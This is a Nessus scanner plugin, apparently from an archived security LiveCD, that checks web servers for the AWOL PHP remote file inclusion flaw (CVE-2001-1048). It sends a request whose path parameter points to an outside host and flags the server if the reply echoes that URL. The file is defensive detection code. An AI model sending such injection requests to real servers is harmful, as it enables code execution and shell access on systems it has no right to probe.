home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / awol_injection.nasl < prev    next >
Text File  |  2005-01-14  |  2KB  |  79 lines

  1. #
  2. # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
  3. #
  4. # See the Nessus Scripts License for details
  5. #
  6.  
  7. if(description)
  8. {
  9.  script_id(11102);
  10.  script_bugtraq_id(3387);
  11.  script_version ("$Revision: 1.12 $");
  12.  script_cve_id("CVE-2001-1048");
  13.  name["english"] = "Awol code injection";
  14.  
  15.  script_name(english:name["english"]);
  16.  
  17.  desc["english"] = "
  18. It is possible to make the remote host include php files hosted
  19. on a third party server using AWOL.
  20.  
  21. An attacker may use this flaw to inject arbitrary code in the remote
  22. host and gain a shell with the privileges of the web server.
  23.  
  24. Solution : Upgrade to AWOL 2.1.1 or newer
  25. Risk factor : High";
  26.  
  27.  
  28.  
  29.  
  30.  script_description(english:desc["english"]);
  31.  
  32.  summary["english"] = "Checks for the presence of includes/awol-condensed.inc.php";
  33.  
  34.  script_summary(english:summary["english"]);
  35.  
  36.  script_category(ACT_ATTACK);
  37.  
  38.  
  39.  script_copyright(english:"This script is Copyright (C) 2002 Renaud Deraison",
  40.         francais:"Ce script est Copyright (C) 2002 Renaud Deraison");
  41.  family["english"] = "CGI abuses";
  42.  family["francais"] = "Abus de CGI";
  43.  script_family(english:family["english"], francais:family["francais"]);
  44.  script_dependencie("find_service.nes", "http_version.nasl");
  45.  script_require_ports("Services/www", 80);
  46.  exit(0);
  47. }
  48.  
  49. #
  50. # The script code starts here
  51. #
  52.  
  53. include("http_func.inc");
  54. include("http_keepalive.inc");
  55.  
  56. port = get_http_port(default:80);
  57.  
  58. if(!get_port_state(port))exit(0);
  59. if(!can_host_php(port:port)) exit(0);
  60.  
  61. function check(url)
  62. {
  63.  req = http_get(item:string(url, "/includes/awol-condensed.inc.php?path=http://xxxxxxxx/"),
  64.          port:port);
  65.  r = http_keepalive_send_recv(port:port, data:req);
  66.  if( r == NULL ) exit(0);
  67.  if("http://xxxxxxxx/config.inc.php" >< r)
  68.         {
  69.      security_hole(port);
  70.     exit(0);
  71.     }
  72. }
  73.  
  74. check(url:"");
  75. foreach dir (cgi_dirs())
  76. {
  77. check(url:dir);
  78. }
  79.